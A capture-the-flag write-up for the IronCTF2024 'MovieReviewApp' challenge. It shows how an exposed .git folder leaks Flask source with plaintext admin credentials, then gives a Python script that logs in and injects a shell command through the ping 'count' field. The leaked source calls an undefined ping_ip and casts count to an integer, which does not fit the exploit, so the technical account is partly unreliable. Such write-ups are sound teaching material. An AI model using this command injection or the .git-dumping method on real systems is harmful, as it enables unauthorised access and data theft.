IronCTF2024 | MovieReviewApp

Introduction#

The challenge looks like a very simple site in pure html where we see reviews on movies

Source#

Is not present the source BUT…

Solution#

The first thing that stands out is that in the URL there are extensions, so we understand that probably the system behind it is not very complex, in fact, going to the root endpoint we notice

alt text

That directory listing is active and a .git folder exists

This allows us to see all the committed versions of the application

But I don’t recommend to manually dump the whole folder so we rely on a very useful tool found on github GitTools

Using the dump script, we can dump the entire .git folder and then use the extractor tool to restore all the versions.

What we get is the source with all its versions.

Leaked source#

1
from flask import Flask, render_template, request, redirect, url_for, flash, session
2
import psutil
3
import os
4
import platform
5
import subprocess
6
import re
7

8
app = Flask(__name__)
9
app.secret_key = os.urandom(32)
10

11
ADMIN_USERNAME = 'superadmin'
12
ADMIN_PASSWORD = 'Sup3rS3cR3TAdminP@ssw0rd$!'
13

14
@app.route('/')
15
def home():
16
    return render_template('index.html')
17

18
@app.route('/admin', methods=['GET', 'POST'])
19
def admin():
20
    if request.method == 'POST':
21
        username = request.form.get('username')
22
        password = request.form.get('password')
23
        if username == ADMIN_USERNAME and password == ADMIN_PASSWORD:
24
            session['logged_in'] = True
25
            return redirect(url_for('admin_panel'))
26
        else:
27
            flash("Invalid credentials. Please try again.")
28

29
    return render_template('login.html')
30

31
@app.route('/admin_panel', methods=['GET', 'POST'])
32
def admin_panel():
33
    if 'logged_in' not in session:
34
        return redirect(url_for('admin'))
35
    ping_result = None
36
    if request.method == 'POST':
37
        ip = request.form.get('ip')
38
        count = request.form.get('count', 1)
39
        try:
40
            count = int(count)
41
            ping_result = ping_ip(ip, count)
42
        except ValueError:
43
            flash("Count must be a valid integer")
44
        except Exception as e:
45
            flash(f"An error occurred: {e}")
46

47
    memory_info = psutil.virtual_memory()
48
    memory_usage = memory_info.percent
49
    total_memory = memory_info.total / (1024 ** 2)
50
    available_memory = memory_info.available / (1024 ** 2)
51

52
    return render_template('admin.html', ping_result=ping_result,
53
                           memory_usage=memory_usage, total_memory=total_memory,
54
                           available_memory=available_memory)
55

56

57
if __name__ == '__main__':
58
    app.run(debug=True)

We can see two interesting things: the first that stands out is that the admin’s credentials are in the clear, and another is that we have another RCE to run.

Exploit#

1
#!/usr/bin/python3
2

3
import requests
4
from bs4 import BeautifulSoup
5

6
BASE_URL = "https://movie-review.1nf1n1ty.team"
7
URL_HOOK = ""
8

9
ADMIN_USERNAME = 'superadmin'
10
ADMIN_PASSWORD = 'Sup3rS3cR3TAdminP@ssw0rd$!'
11

12
s = requests.Session()
13

14
def login():
15
  r = s.post(BASE_URL + "/servermonitor/admin",data={"username":ADMIN_USERNAME,"password":ADMIN_PASSWORD})
16
  if r.status_code == 200:
17
    print("[+] Login Success")
18
  else:
19
    print("[!] Login Failed")
20
    exit(1)
21

22
def exploit():
23
  flag = BeautifulSoup(s.post(BASE_URL + "/servermonitor/admin_panel",data={"ip":"8.8.8.8","count":"1;cat '/flag.txt' #"}).text, 'html.parser').find_all('pre')[0].text
24
  print("[+] Flag: ",flag)
25

26
def main():
27
  login()
28
  exploit()
29

30

31
if __name__ == "__main__":
32
  main()
33

34
# goodluck by @akiidjk

The solution is very simple, let’s log in to the admin panel and then take advantage of the fact that the count parameter is not sanitized to execute a command of our choice and set the flag

flag: ironCTF{4lways_b3_c4ar3ful_w1th_G1t!}